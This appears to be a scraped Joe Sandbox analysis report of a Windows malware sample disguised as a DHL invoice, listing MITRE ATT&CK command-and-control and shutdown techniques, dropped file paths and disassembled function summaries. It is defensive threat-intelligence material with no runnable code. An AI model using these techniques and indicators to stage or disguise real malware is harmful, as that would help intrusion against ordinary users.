Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL_#U53d1#U7968.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang\slbene.exe

C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang\tvesprogede.fed

C:\Users\user\AppData\Local\Temp\mnstring\Lithoed\Valutaenhederne\Lecanomancy\glucosic.dal

C:\Users\user\AppData\Local\Temp\mnstring\Vrdistemplingerne\Braveries65.Lse

C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.exe

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Windows Analysis Report
DHL_#U53d1#U7968.exe

Function 004036FC Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 416
stringfilecomCOMMON

Function 00404B30 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 295
windowclipboardmemoryCOMMON

Function 0040154A Relevance: 38.9, APIs: 17, Strings: 5, Instructions: 441
stringtimesleepCOMMON

Function 6EF22351 Relevance: 18.7, APIs: 12, Instructions: 705
stringlibrarymemoryCOMMONCrypto

Function 00406719 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Function 004065CF Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00404F92 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Function 00405A3E Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 225
stringregistryCOMMON

Function 004033ED Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 178
memoryCOMMON

Function 00405EBA Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 209
stringCOMMON

Function 00405D3A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Function 00403148 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 167
COMMON

Function 0040619E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00406A56 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Function 0040225D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81
libraryCOMMON

Function 00402656 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
registrystringCOMMON

Function 004068E6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Function 00405E3E Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Function 00405E1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Function 6EF2167A Relevance: 4.6, APIs: 3, Instructions: 123
COMMON

Function 004027B0 Relevance: 4.6, APIs: 3, Instructions: 53
registryCOMMON

Function 00402728 Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre